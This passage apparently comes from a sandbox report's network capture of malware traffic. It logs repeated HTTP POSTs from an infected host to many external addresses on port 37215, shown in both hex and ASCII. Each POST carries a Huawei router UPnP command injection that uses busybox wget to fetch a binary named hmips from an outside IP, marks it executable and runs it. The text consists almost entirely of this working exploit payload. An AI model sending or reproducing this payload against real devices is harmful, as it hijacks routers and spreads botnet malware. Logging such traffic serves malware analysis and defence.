6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.201963902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.417897940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      128192.168.2.1452760102.60.207.10237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.864772081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.458034992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.161926985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.537858009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:13.450042009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      129192.168.2.143779241.226.198.11937215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.878957987 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.490000010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.193926096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      130192.168.2.1444616102.221.20.11737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.882541895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
